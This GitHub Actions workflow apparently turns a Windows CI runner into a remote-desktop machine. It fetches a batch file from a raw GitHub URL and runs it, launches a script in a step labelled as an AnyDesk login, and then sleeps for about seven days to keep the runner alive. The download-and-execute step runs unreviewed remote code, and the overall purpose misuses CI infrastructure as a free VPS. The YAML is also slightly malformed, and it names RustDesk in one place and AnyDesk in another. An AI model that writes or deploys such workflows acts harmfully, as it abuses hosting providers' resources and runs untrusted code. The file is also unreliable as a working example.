name: Windows - RustDesk

on:
  workflow_dispatch:

jobs:
  build:
    name: Start Building...
    runs-on: windows-latest
    timeout-minutes: 10080
    
    steps:
      - name: Downloading & Installing Essentials
        run: |
          Invoke-WebRequest -Uri "https://raw.githubusercontent.com/VexterLabs/Vps/refs/heads/main/.github/workflows/Downloads.bat" -OutFile "Downloads.bat"
          cmd /c Downloads.bat
          
      - name: Log In To AnyDesk
        run: cmd /c show.bat
        
      - name: Starting Time
        run: |
       Start-Sleep -Seconds 599950
       
      - name: Time Counter
        run: python time.py
